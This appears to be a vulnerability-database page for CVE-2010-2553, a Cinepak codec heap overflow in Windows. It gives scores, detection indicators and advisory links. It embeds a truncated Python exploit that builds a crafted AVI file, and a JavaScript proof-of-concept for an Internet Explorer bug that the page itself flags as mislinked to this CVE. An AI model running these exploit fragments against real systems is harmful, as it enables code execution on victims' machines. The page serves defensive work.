CVE-2010-2553
published 2010-08-11CVE-2010-2553: The Cinepak codec in Microsoft Windows XP SP2 and SP3, Windows Vista SP1 and SP2, and Windows 7 does not properly decompress media files, which allows remote…
PriorityP266critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
30.89%
98.0th percentile
The Cinepak codec in Microsoft Windows XP SP2 and SP3, Windows Vista SP1 and SP2, and Windows 7 does not properly decompress media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Cinepak Codec Decompression Vulnerability."
Detection & IOCsextracted from sources · hover to see the quote
- →Crafted AVI file with malformed Cinepak codec data triggers heap overflow in iccvid.dll; look for AVI files with anomalous 'number_of_coded_strips' field (e.g. 0x0010 = 16 strips) combined with undersized strip data. ↗
- →Malicious AVI contains the 'cvid' FourCC in the stream format header, identifying Cinepak-encoded video; inspect BITMAPINFOHEADER compression field for 0x64697663 ('cvid'). ↗
- →Exploit generates a crafted AVI with RIFF/AVI headers, a 'movi' LIST chunk containing a '00dc' video chunk, and an 'idx1' index; detect AVI files where Cinepak frame header declares dimensions inconsistent with strip data size. ↗
- →The vulnerability is in the CVDecompress function of iccvid.dll; monitor for heap corruption exceptions originating from iccvid.dll during media file decompression. ↗
- ·Proof-of-concept targets iccvid.dll on Windows XP SP3 specifically; exploit reliability and heap spray offsets may differ on Windows Vista SP1/SP2 and Windows 7. ↗
- ·DOC 3 (exploit-db 15122) references a separate MSHTML findText vulnerability in Internet Explorer and is unrelated to CVE-2010-2553; no operational IOCs from that source apply to this CVE. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer - MSHTML Findtext Processing
exploitdb·2010-09-27
CVE-2010-2553 Microsoft Internet Explorer - MSHTML Findtext Processing
Microsoft Internet Explorer - MSHTML Findtext Processing
---
function Search(){
var textinput = document.getElementById("Abysssec");
var textRange = textinput.createTextRange();
textRange.findText(unescape("%u4141"),-1);
textRange.select(document.getElementById('d'));
document.body.appendChild(textinput);
}
Abysssec
http://www.exploit-db.com/moaub-27-microsoft-internet-explorer-mshtml-findtext-processing-issue/
Exploit-DB
Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)
exploitdb·2010-09-26·CVSS 9.3
CVE-2010-2553 [CRITICAL] Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)
Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-26-microsoft-cinepak-codec-cvdecompress-heap-overflow-ms10-055/
'''
'''
Title : Microsoft Cinepak Codec CVDecompress Heap Overflow
Version : iccvid.dll XP SP3
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : High
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-2553
MOAUB Number :
'''
import sys
def main():
aviHeaders = '\x52\x49\x46\x46\x58\x01\x00\x00\x41\x56\x49\x20\x4C\x49\x53\x54\xC8\x00\x00\x00\x68\x64\x72\x6C\x61\x76\x69\x
No writeups or analysis indexed.
http://www.us-cert.gov/cas/techalerts/TA10-222A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-055https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11773http://www.us-cert.gov/cas/techalerts/TA10-222A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-055https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11773
2010-08-11
Published